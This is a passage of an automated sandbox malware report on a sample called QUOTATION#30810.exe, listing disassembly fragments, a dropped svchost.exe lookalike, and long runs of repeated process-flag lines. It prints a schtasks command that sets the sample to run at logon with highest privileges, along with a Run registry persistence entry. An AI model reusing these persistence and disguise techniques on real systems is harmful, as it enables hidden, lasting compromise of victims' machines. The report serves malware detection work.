Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 16_2_00007FFB4AF900BD pushad ; iretd	16_2_00007FFB4AF900C1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 16_2_00007FFB4AF9CB5A pushad ; retf	16_2_00007FFB4AF9CB79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 16_2_00007FFB4B07026B push esp; retf 4810h	16_2_00007FFB4B070312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 20_2_10002806 push ecx; ret	20_2_10002819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00457106 push ecx; ret	26_2_00457119
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0045B11A push esp; ret	26_2_0045B141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0045E54D push esi; ret	26_2_0045E556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00457A28 push eax; ret	26_2_00457A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00434E56 push ecx; ret	26_2_00434E69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0044693D push ecx; ret	32_2_0044694D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0044DB70 push eax; ret	32_2_0044DB84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0044DB70 push eax; ret	32_2_0044DBAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_00451D54 push eax; ret	32_2_00451D61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_0044B090 push eax; ret	37_2_0044B0A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_0044B090 push eax; ret	37_2_0044B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00451D34 push eax; ret	37_2_00451D41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00444E71 push ecx; ret	37_2_00444E81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00414060 push eax; ret	39_2_00414074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00414060 push eax; ret	39_2_0041409C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00414039 push ecx; ret	39_2_00414049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_004164EB push 0000006Ah; retf	39_2_004165C4

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_00406EB0 ShellExecuteW,URLDownloadToFileW,

26_2_00406EB0

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

26_2_0041AA4A

Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

26_2_0041CB50

Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
